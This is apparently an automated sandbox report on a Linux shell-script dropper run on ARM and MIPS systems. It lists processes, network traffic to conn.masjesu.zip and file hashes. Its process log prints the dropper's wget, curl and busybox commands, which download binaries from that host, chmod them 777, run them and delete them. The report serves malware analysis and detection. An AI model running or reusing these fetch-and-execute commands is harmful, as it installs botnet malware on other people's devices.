Analysis: behavioral2
Detonation Overview
Submitted
2024-10-21 01:39
Reported
2024-10-21 01:41
Platform
debian9-armhf-20240729-en
Max time kernel
149s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-21 01:39
Reported
2024-10-21 01:41
Platform
debian9-mipsbe-20240611-en
Max time kernel
146s
Max time network
148s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c | /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c | N/A |
| N/A | /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F | /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F | N/A |
| N/A | /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 | /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 | N/A |
| N/A | /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt | /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt | N/A |
| N/A | /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL | /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL | N/A |
| N/A | /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI | /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI | N/A |
| N/A | /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH | /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH | N/A |
| N/A | /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG | /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG | N/A |
| N/A | /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx | /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx | N/A |
| N/A | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | N/A |
| N/A | /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW | /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW | N/A |
| N/A | /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW | /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW | N/A |
| N/A | /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst | /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst | N/A |
| N/A | /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI | /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI | N/A |
| N/A | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW | /usr/bin/curl | N/A |
Processes
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/chmod
[chmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c
[./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/rm
[rm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/bin/chmod
[chmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F
[./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/bin/rm
[rm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/bin/chmod
[chmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6
[./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/bin/rm
[rm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/bin/chmod
[chmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt
[./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/bin/rm
[rm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/bin/chmod
[chmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL
[./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/bin/rm
[rm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/bin/chmod
[chmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI
[./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/bin/rm
[rm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/bin/chmod
[chmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH
[./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/bin/rm
[rm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/bin/chmod
[chmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG
[./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/bin/rm
[rm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/bin/chmod
[chmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx
[./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/bin/rm
[rm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/chmod
[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB
[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/rm
[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/bin/chmod
[chmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW
[./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/bin/rm
[rm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/bin/chmod
[chmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW
[./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/bin/rm
[rm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/bin/chmod
[chmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst
[./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/bin/rm
[rm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/bin/chmod
[chmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI
[./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/bin/rm
[rm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/chmod
[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB
[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/rm
[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |